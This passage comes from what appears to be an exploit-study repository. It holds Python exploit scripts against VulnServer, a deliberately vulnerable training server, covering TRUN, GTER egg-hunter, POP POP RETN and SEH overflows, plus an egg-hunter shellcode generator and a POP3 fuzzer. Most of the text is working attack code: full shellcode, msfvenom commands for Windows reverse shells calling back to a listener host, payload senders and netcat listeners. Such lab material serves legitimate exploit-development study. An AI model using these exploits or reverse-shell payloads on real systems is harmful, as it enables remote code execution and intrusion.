	# buffer = NOP sled          # |---------------------------------------------------------|-|-+
	# buffer = Shellcode         # |---------------------------------------------------------|-|-|-+
	# buffer = BBB padding       # |---------------------------------------------------------|-|-|-|-+
	#----------------------------#                                                           | | | | |
	#                                                                                        | | | | |
	buffer  = "TRUN ." + "A" * 2006                    # <-----------------------------------+ | | | |
	buffer += struct.pack('<L', 0x625011af)            # <-------------------------------------+ | | |
	buffer += "\x90" * 40                              # <---------------------------------------+ | |
	buffer += shellcode                                # <-----------------------------------------+ |
	buffer += "B" * (3000-6-2006-4-40-len(shellcode))  # <-------------------------------------------+

	try:
		r = remote('192.168.199.140', 9999)
		r.recv(2048)
		print "[+] Sending %s bytes evil payload.." %len(buffer)
		r.send(buffer)
	except:
		print "Couldn't connect to target!"

def main():

	print (
	'''
	+-+-+-+-+-+-+-+-+-+-+ +-+-+-+-+-+-+ +-+-+-+-+-+-+ +-+-+-+-+-+-+-+-+
	|V|u|l|n|S|e|r|v|e|r| |R|e|m|o|t|e| |B|u|f|f|e|r| |O|v|e|r|f|l|o|w|
	+-+-+-+-+-+-+-+-+-+-+ +-+-+-+-+-+-+ +-+-+-+-+-+-+ +-+-+-+-+-+-+-+-+
	'''
    )
	BufferOverflow()

if __name__ == '__main__':
	main()


================================================
FILE: Remote Buffer Overflow/VulnServer/Egg Hunter/Exploit.py
================================================
import time
import socket
import subprocess


# root@kali:~# msfvenom -p windows/shell_reverse_tcp lhost=192.168.80.151 lport=1337 -b '\x00\x0a\x0d' -e x86/alpha_mixed BufferRegister=EDI -f python -v shellcode
# No platform was selected, choosing Msf::Module::Platform::Windows from the payload
# No Arch selected, selecting Arch: x86 from the payload
# Found 1 compatible encoders
# Attempting to encode payload with 1 iterations of x86/alpha_mixed
# x86/alpha_mixed succeeded with size 702 (iteration=0)
# x86/alpha_mixed chosen with final size 702
# Payload size: 702 bytes
# Final size of python file: 3768 bytes
shellcode =  ""
shellcode += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58"
shellcode += "\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42"
shellcode += "\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
shellcode += "\x42\x75\x4a\x49\x49\x6c\x6a\x48\x4e\x62\x75\x50"
shellcode += "\x57\x70\x73\x30\x31\x70\x4b\x39\x48\x65\x74\x71"
shellcode += "\x59\x50\x55\x34\x4c\x4b\x42\x70\x66\x50\x6c\x4b"
shellcode += "\x53\x62\x76\x6c\x4e\x6b\x53\x62\x46\x74\x6e\x6b"
shellcode += "\x53\x42\x56\x48\x76\x6f\x6c\x77\x72\x6a\x46\x46"
shellcode += "\x36\x51\x39\x6f\x6e\x4c\x47\x4c\x50\x61\x31\x6c"
shellcode += "\x76\x62\x74\x6c\x61\x30\x4f\x31\x38\x4f\x76\x6d"
shellcode += "\x46\x61\x69\x57\x59\x72\x39\x62\x30\x52\x30\x57"
shellcode += "\x4c\x4b\x52\x72\x74\x50\x6e\x6b\x72\x6a\x65\x6c"
shellcode += "\x4c\x4b\x32\x6c\x44\x51\x30\x78\x6d\x33\x52\x68"
shellcode += "\x36\x61\x4a\x71\x52\x71\x4c\x4b\x56\x39\x45\x70"
shellcode += "\x56\x61\x6a\x73\x6c\x4b\x53\x79\x57\x68\x79\x73"
shellcode += "\x37\x4a\x62\x69\x4e\x6b\x75\x64\x4e\x6b\x43\x31"
shellcode += "\x69\x46\x45\x61\x4b\x4f\x4c\x6c\x6a\x61\x48\x4f"
shellcode += "\x54\x4d\x45\x51\x58\x47\x56\x58\x4d\x30\x44\x35"
shellcode += "\x4b\x46\x46\x63\x43\x4d\x68\x78\x77\x4b\x43\x4d"
shellcode += "\x34\x64\x61\x65\x38\x64\x56\x38\x4e\x6b\x53\x68"
shellcode += "\x45\x74\x55\x51\x58\x53\x70\x66\x6c\x4b\x46\x6c"
shellcode += "\x32\x6b\x4e\x6b\x46\x38\x77\x6c\x66\x61\x49\x43"
shellcode += "\x4e\x6b\x43\x34\x4e\x6b\x55\x51\x7a\x70\x6d\x59"
shellcode += "\x37\x34\x71\x34\x65\x74\x43\x6b\x33\x6b\x63\x51"
shellcode += "\x71\x49\x50\x5a\x70\x51\x49\x6f\x69\x70\x73\x6f"
shellcode += "\x43\x6f\x31\x4a\x6e\x6b\x42\x32\x5a\x4b\x4c\x4d"
shellcode += "\x53\x6d\x61\x78\x77\x43\x70\x32\x73\x30\x57\x70"
shellcode += "\x61\x78\x34\x37\x53\x43\x34\x72\x53\x6f\x31\x44"
shellcode += "\x30\x68\x30\x4c\x42\x57\x77\x56\x63\x37\x79\x6f"
shellcode += "\x69\x45\x6f\x48\x4a\x30\x35\x51\x53\x30\x73\x30"
shellcode += "\x76\x49\x68\x44\x31\x44\x72\x70\x35\x38\x64\x69"
shellcode += "\x6f\x70\x50\x6b\x65\x50\x4b\x4f\x58\x55\x30\x50"
shellcode += "\x72\x70\x52\x70\x50\x50\x73\x70\x52\x70\x61\x50"
shellcode += "\x32\x70\x51\x78\x79\x7a\x46\x6f\x69\x4f\x69\x70"
shellcode += "\x79\x6f\x4a\x75\x6c\x57\x62\x4a\x43\x35\x61\x78"
shellcode += "\x4f\x30\x69\x38\x72\x70\x6f\x67\x72\x48\x54\x42"
shellcode += "\x55\x50\x65\x55\x75\x69\x4f\x79\x6a\x46\x33\x5a"
shellcode += "\x56\x70\x33\x66\x62\x77\x50\x68\x7a\x39\x6d\x75"
shellcode += "\x50\x74\x33\x51\x49\x6f\x48\x55\x6b\x35\x69\x50"
shellcode += "\x51\x64\x46\x6c\x4b\x4f\x42\x6e\x47\x78\x52\x55"
shellcode += "\x48\x6c\x63\x58\x48\x70\x4d\x65\x49\x32\x33\x66"
shellcode += "\x79\x6f\x39\x45\x51\x78\x53\x53\x72\x4d\x63\x54"
shellcode += "\x55\x50\x6d\x59\x38\x63\x71\x47\x53\x67\x36\x37"
shellcode += "\x56\x51\x68\x76\x70\x6a\x65\x42\x56\x39\x50\x56"
shellcode += "\x49\x72\x49\x6d\x33\x56\x49\x57\x33\x74\x77\x54"
shellcode += "\x47\x4c\x37\x71\x75\x51\x6e\x6d\x53\x74\x67\x54"
shellcode += "\x72\x30\x49\x56\x63\x30\x57\x34\x50\x54\x70\x50"
shellcode += "\x36\x36\x61\x46\x51\x46\x52\x66\x51\x46\x62\x6e"
shellcode += "\x61\x46\x51\x46\x50\x53\x70\x56\x75\x38\x70\x79"
shellcode += "\x4a\x6c\x57\x4f\x4f\x76\x69\x6f\x6a\x75\x6b\x39"
shellcode += "\x59\x70\x52\x6e\x62\x76\x30\x46\x59\x6f\x74\x70"
shellcode += "\x61\x78\x47\x78\x4d\x57\x67\x6d\x65\x30\x79\x6f"
shellcode += "\x6a\x75\x4f\x4b\x6a\x50\x6f\x45\x4d\x72\x42\x76"
shellcode += "\x62\x48\x6d\x76\x6c\x55\x4d\x6d\x6f\x6d\x59\x6f"
shellcode += "\x39\x45\x45\x6c\x67\x76\x61\x6c\x66\x6a\x6d\x50"
shellcode += "\x39\x6b\x49\x70\x33\x45\x57\x75\x4d\x6b\x63\x77"
shellcode += "\x45\x43\x72\x52\x42\x4f\x31\x7a\x63\x30\x52\x73"
shellcode += "\x4b\x4f\x59\x45\x41\x41"

# first payload
Eggy  = 'T00WT00W'
Eggy += shellcode
Eggy += '\x41' * (1000-len(shellcode)-10)
Eggy += '\r\n'

'''
or dx,0x0fff      # loop thru memory pages
inc edx by 1      # loop thru addresses for given page
push edx          # save EDX in stack before syscall
push byte +0x43   # push 0x43 (syscall id for NtDisplayString) onto the stack
pop eax           # store it in EAX
int 0x2e          # make syscall
cmp al,0x5        # compare lower portion of EAX with 5 to check for access violations
pop edx           # restore EDX after syscal was made
jz 0x0            # if true go back to first instruction and check the next memory page
mov eax,w00t      # else move egg marker value to eax
mov edi,edx       # move pointer to EDI
scasd             # check for egg value match
jnz 0x5           # if true jump to increment EDX and check the next memory address in page
scasd             # else increment EDI and check the value again (to make sure it's not egghunter code)
jnz 0x5           # if true jump to increment EDX and check the next memory address in page
jmp edi           # else egg marker found! execute shellcode positioned right after 
'''
EggHunter = '\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7\x90'

'''
spike file
----------
s_string("GTER");
s_string(" ");
s_string_variable("FUZZ");
s_string("\r\n");
sleep(1);
'''

# second payload
buffer  = 'GTER /.:/'                                           # vulnerable command
'''
0:  5a                      pop    edx
1:  4d                      dec    ebp
2:  5f                      pop    edi
'''
buffer += '\x5a\x4d\x5f'                                        # stack alignment to compensate for changes made by GTER command
buffer += EggHunter                                             # hunt baby hunt
buffer += '\x41' * (147-3-len(EggHunter))                       # filler to save pointer
buffer += '\xb1\x11\x50\x62'                                    # EIP [call eax] to get back to the start of our the buffer
buffer += '\x43' * (5000-9-147-4-2)                             # filler
buffer += '\r\n'

try:
	s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect(('192.168.80.133', 9999))
	print '[+] Sending %s bytes of eggy' %len(Eggy)
	s.send(Eggy)
	s.close
	time.sleep(1)
except Exception as e:
	print e

try:
        s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(('192.168.80.133', 9999))
        print '[+] Sending %s bytes of buffer' %len(buffer)
        time.sleep(1)
        s.send(buffer)
	subprocess.call(['nc -nlvp 1337'], shell=True)
except Exception as e:
        print e



================================================
FILE: Remote Buffer Overflow/VulnServer/Egg Hunter/README.md
================================================
Save pointer overrun found in `GTER` command, egg hunter was used to overcome small buffer size issue.
<p align="center">
  <img src="https://github.com/ihack4falafel/OSCE/blob/master/Remote%20Buffer%20Overflow/VulnServer/Egg%20Hunter/PoC.gif">
</p>


================================================
FILE: Remote Buffer Overflow/VulnServer/POP POP RETN/Exploit.py
================================================
#!/usr/share/python

import struct
import time
import socket
from pwn import *

def BufferOverflow():

	# https://packetstormsecurity.com/files/102847/All-Windows-Null-Free-CreateProcessA-Calc-Shellcode.html
	shellcode  = ""
	shellcode += "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
	shellcode += "\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
	shellcode += "\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
	shellcode += "\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
	shellcode += "\x57\x78\x01\xc2\x8b\x7a\x20\x01"
	shellcode += "\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
	shellcode += "\x45\x81\x3e\x43\x72\x65\x61\x75"
	shellcode += "\xf2\x81\x7e\x08\x6f\x63\x65\x73"
	shellcode += "\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
	shellcode += "\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
	shellcode += "\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
	shellcode += "\xb1\xff\x53\xe2\xfd\x68\x63\x61"
	shellcode += "\x6c\x63\x89\xe2\x52\x52\x53\x53"
	shellcode += "\x53\x53\x53\x53\x52\x53\xff\xd7"

	#----------------------------#
	#           Payload          #
	#----------------------------#
	# buffer = CMD + AAA padding # |-------------------------------------------------------------+
	# buffer = EIP overwrite     # |---------| WinXP SP3 Pro [POP POP RETN]|[USER32.dll] |-------|-+
	# buffer = XXXXXXXX          # |------------| Simulate the need for [POP POP RETN] |---------|-|-+
	# buffer = JMP ESP           # |---------| WinXP SP3 Pro : [JMP ESP] | [essfunc.dll] |-------|-|-|-+
	# buffer = NOP sled          # |-------------------------------------------------------------|-|-|-|-+
	# buffer = shellcode         # |-------------------------------------------------------------|-|-|-|-|-+
	# buffer = BBB padding       # |-------------------------------------------------------------|-|-|-|-|-|-+
        #----------------------------#                                                               | | | | | | |
	#                                                                                            | | | | | | |
	buffer  = "TRUN ." + "A" * 2006                        # <-----------------------------------+ | | | | | |
	buffer += struct.pack('<L', 0x7E41FE66)                # <-------------------------------------+ | | | | |
	buffer += "X" * 8                                      # <---------------------------------------+ | | | |
	buffer += struct.pack('<L', 0x625011af)                # <-----------------------------------------+ | | |
	buffer += "\x90" * 20                                  # <-------------------------------------------+ | |
	buffer += shellcode                                    # <---------------------------------------------+ |
	buffer += "B" * (3000-6-2006-4-8-4-20-len(shellcode))  # <-----------------------------------------------+

	try:
		r = remote('192.168.80.133', 9999)
		r.recv(2048)
		print "[+] Sending %s bytes evil payload.." %len(buffer)
		r.send(buffer)
	except:
		print "Couldn't connect to target!"

def main():

	print (
	'''
	+-+-+-+-+-+-+-+-+-+-+ +-+-+-+-+-+-+ +-+-+-+-+-+-+ +-+-+-+-+-+-+-+-+
	|V|u|l|n|S|e|r|v|e|r| |R|e|m|o|t|e| |B|u|f|f|e|r| |O|v|e|r|f|l|o|w|
	+-+-+-+-+-+-+-+-+-+-+ +-+-+-+-+-+-+ +-+-+-+-+-+-+ +-+-+-+-+-+-+-+-+
	'''
    )
	BufferOverflow()

if __name__ == '__main__':
	main()



================================================
FILE: Remote Buffer Overflow/VulnServer/SEH/Exploit.py
================================================
import socket
import sys
import os
import subprocess

#root@kali:~# msfvenom -p windows/shell_reverse_tcp lhost=192.168.80.151 lport=1337 -b '\x00' EXITFUNC=seh -f python -v shellcode
#No platform was selected, choosing Msf::Module::Platform::Windows from the payload
#No Arch selected, selecting Arch: x86 from the payload
#Found 10 compatible encoders
#Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
#x86/shikata_ga_nai succeeded with size 351 (iteration=0)
#x86/shikata_ga_nai chosen with final size 351
#Payload size: 351 bytes
#Final size of python file: 1900 bytes
shellcode =  ""
shellcode += "\xda\xcc\xbe\xc1\x1a\x26\xcc\xd9\x74\x24\xf4\x5f"
shellcode += "\x29\xc9\xb1\x52\x31\x77\x17\x83\xef\xfc\x03\xb6"
shellcode += "\x09\xc4\x39\xc4\xc6\x8a\xc2\x34\x17\xeb\x4b\xd1"
shellcode += "\x26\x2b\x2f\x92\x19\x9b\x3b\xf6\x95\x50\x69\xe2"
shellcode += "\x2e\x14\xa6\x05\x86\x93\x90\x28\x17\x8f\xe1\x2b"
shellcode += "\x9b\xd2\x35\x8b\xa2\x1c\x48\xca\xe3\x41\xa1\x9e"
shellcode += "\xbc\x0e\x14\x0e\xc8\x5b\xa5\xa5\x82\x4a\xad\x5a"
shellcode += "\x52\x6c\x9c\xcd\xe8\x37\x3e\xec\x3d\x4c\x77\xf6"
shellcode += "\x22\x69\xc1\x8d\x91\x05\xd0\x47\xe8\xe6\x7f\xa6"
shellcode += "\xc4\x14\x81\xef\xe3\xc6\xf4\x19\x10\x7a\x0f\xde"
shellcode += "\x6a\xa0\x9a\xc4\xcd\x23\x3c\x20\xef\xe0\xdb\xa3"
shellcode += "\xe3\x4d\xaf\xeb\xe7\x50\x7c\x80\x1c\xd8\x83\x46"
shellcode += "\x95\x9a\xa7\x42\xfd\x79\xc9\xd3\x5b\x2f\xf6\x03"
shellcode += "\x04\x90\x52\x48\xa9\xc5\xee\x13\xa6\x2a\xc3\xab"
shellcode += "\x36\x25\x54\xd8\x04\xea\xce\x76\x25\x63\xc9\x81"
shellcode += "\x4a\x5e\xad\x1d\xb5\x61\xce\x34\x72\x35\x9e\x2e"
shellcode += "\x53\x36\x75\xae\x5c\xe3\xda\xfe\xf2\x5c\x9b\xae"
shellcode += "\xb2\x0c\x73\xa4\x3c\x72\x63\xc7\x96\x1b\x0e\x32"
shellcode += "\x71\xe4\x67\x6c\x16\x8c\x75\x8c\x1d\x74\xf3\x6a"
shellcode += "\x77\x96\x55\x25\xe0\x0f\xfc\xbd\x91\xd0\x2a\xb8"
shellcode += "\x92\x5b\xd9\x3d\x5c\xac\x94\x2d\x09\x5c\xe3\x0f"
shellcode += "\x9c\x63\xd9\x27\x42\xf1\x86\xb7\x0d\xea\x10\xe0"
shellcode += "\x5a\xdc\x68\x64\x77\x47\xc3\x9a\x8a\x11\x2c\x1e"
shellcode += "\x51\xe2\xb3\x9f\x14\x5e\x90\x8f\xe0\x5f\x9c\xfb"
shellcode += "\xbc\x09\x4a\x55\x7b\xe0\x3c\x0f\xd5\x5f\x97\xc7"
shellcode += "\xa0\x93\x28\x91\xac\xf9\xde\x7d\x1c\x54\xa7\x82"
shellcode += "\x91\x30\x2f\xfb\xcf\xa0\xd0\xd6\x4b\xde\x21\xea"
shellcode += "\x41\x77\x98\x9f\x2b\x15\x1b\x4a\x6f\x20\x98\x7e"
shellcode += "\x10\xd7\x80\x0b\x15\x93\x06\xe0\x67\x8c\xe2\x06"
shellcode += "\xdb\xad\x26"

'''
spike file
----------
s_string("GMON");
s_string(" ");
s_string_variable("FUZZ");
s_string("\r\n");
'''

buffer  = 'GMON /.:/ '                  # junk
buffer += '\x90' * 2495                 # nop sled
buffer += shellcode                     # reverse shell
buffer += '\x90' * (999-len(shellcode)) # shellcode placeholder
buffer += '\xeb\x0a\x90\x90'            # nSEH hop over SEH handler
buffer += '\x2b\x17\x50\x62'            # SEH POP, POP, RETN in essfunc.dll

'''
piece of code that allow us to jump forward/backward, taken from Phrack #62 Article 7
fldz
fnstenv [esp-12]
pop ecx
add cl, 10
nop
dec ch  ; ecx=-256;
dec ch  ; ecx=-256;
dec ch  ; ecx=-256;
dec ch  ; ecx=-256;
jmp ecx ; lets jmp ecx (current location - 1024)
'''

buffer += '\x90' * 7
buffer += '\xD9\xEE\xD9\x74\x24\xF4\x59\x80\xC1\x0A\x90\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFF\xE1'
buffer += '\x41' * (5000-10-3494-4-4-2-21-7)
buffer += '\r\n'

try:
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect(('192.168.80.133', 9999))
	print '[+] Sending %s bytes of evil buffer..' %len(buffer)
	s.send(buffer)
	subprocess.call(['nc -nlvp 1337'], shell=True)
except Exception as e:
	print e



================================================
FILE: Remote Buffer Overflow/VulnServer/SEH/README.md
================================================
Vanilla Structured Exception Handler overwrite found in `GMON` command using `Spike` fuzzer.

<p align="center">
  <img src="https://github.com/ihack4falafel/OSCE/blob/master/Remote%20Buffer%20Overflow/VulnServer/SEH/PoC.gif">
</p>


================================================
FILE: Remote Buffer Overflow/VulnServer/readme.md
================================================
### VulnServer

VulnerServer is a purposly vulnerable server made so people like me can learn software exploitation. The subfolders contian all working exploits found in VulnerServer.

![alt text](https://github.com/ihack4falafel/OSCE/blob/master/Remote%20Buffer%20Overflow/VulnServer/PoC.JPG)


================================================
FILE: Tools/EggHunter.py
================================================
#!/usr/bin/python

import binascii
import time
import sys

# colors (*NIX systems only)
W = '\033[0m'  # white
R = '\033[91m' # Light Red
G = '\033[32m' # green
M = '\033[95m' # Light magenta

# the script takes user supplied egg as input and plug it to Skape's piece of art! the output (opcode) is debugger and binary file friendly.
# Reference: "Safely Searching Process Virtual Address Space" skape 2004 http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf
# 0:  66 81 ca ff 0f          or     dx,0xfff
# 5:  42                      inc    edx
# 6:  52                      push   edx
# 7:  6a 02                   push   0x2
# 9:  58                      pop    eax
# a:  cd 2e                   int    0x2e
# c:  3c 05                   cmp    al,0x5
# e:  5a                      pop    edx
# f:  74 ef                   je     0x0
# 11: b8 54 30 30 57          mov    eax,0x57303054           egg = "T00W"
# 16: 8b fa                   mov    edi,edx
# 18: af                      scas   eax,DWORD PTR es:[edi]
# 19: 75 ea                   jne    0x5
# 1b: af                      scas   eax,DWORD PTR es:[edi]
# 1c: 75 e7                   jne    0x5
# 1e: ff e7                   jmp    edi 

if len(sys.argv) < 2:
		print "Usage: python EggHunter.py <"+G+"egg"+W+">"
		sys.exit(0)

Input          = str(sys.argv[1])
Egg            = binascii.hexlify(Input)
Egg            = list(Egg)
OpCode         = Egg[6]+Egg[7]+Egg[4]+Egg[5]+Egg[2]+Egg[3]+Egg[0]+Egg[1]
Shellcode      = "\\x"+Egg[6]+Egg[7]+"\\x"+Egg[4]+Egg[5]+"\\x"+Egg[2]+Egg[3]+"\\x"+Egg[0]+Egg[1]
FinalOpcode    = "6681caff0f42526a0258cd2e3c055a74efb8" +M+ OpCode +W+ "8bfaaf75eaaf75e7ffe7"
FinalShellcode = "'\\x66\\x81\\xca\\xff\\x0f\\x42\\x52\\x6a\\x02\\x58\\xcd\\x2e\\x3c\\x05\\x5a\\x74\\xef\\xb8" +M+ Shellcode +W+ "\\x8b\\xfa\\xaf\\x75\\xea\\xaf\\x75\\xe7\\xff\\xe7'"

print "["+G+"+"+W+"] Egg Hunter shellcode with egg of '"+M+Input+W+"'.."
time.sleep(1)
print R+"Final Opcode    "+W+": " + FinalOpcode
print R+"Final Shellcode "+W+": " + FinalShellcode


================================================
FILE: Tools/FuzzMe.py
================================================
#!/usr/share/python

import socket
from pwn import *
import time

def Fuzzer():

	buffer = ["A"]
	counter = 500
	while len(buffer) <= 100:
		buffer.append("A" * counter)
		counter = counter + 500
	try:
		# Used SLMail as template here, adjust accordingly!
		r = remote('192.168.199.140', 110)
		r.recv(2048)

		for string in buffer:
			print "Fuzzing with %s bytes of payload" %len(string)
			r.send('USER username\r\n')
			r.recv(2048)
			r.send('PASS ' + string + '\r\n')
			r.recv(2048)
			time.sleep(1)
	except:
		print "Couldn't connect to target, or you hit the jackpot!"


def main():

	print (
	'''
	 _______ _______ _______ _______ _______ _______
	|\     /|\     /|\     /|\     /|\     /|\     /|
	| +---+ | +---+ | +---+ | +---+ | +---+ | +---+ |
	| |   | | |   | | |   | | |   | | |   | | |   | |
	| |F  | | |u  | | |z  | | |z  | | |M  | | |e  | |
	| +---+ | +---+ | +---+ | +---+ | +---+ | +---+ |
	|/_____\|/_____\|/_____\|/_____\|/_____\|/_____\|
	by @ihack4falafel
	'''
	)

	Fuzzer()

if __name__ == '__main__':
	main()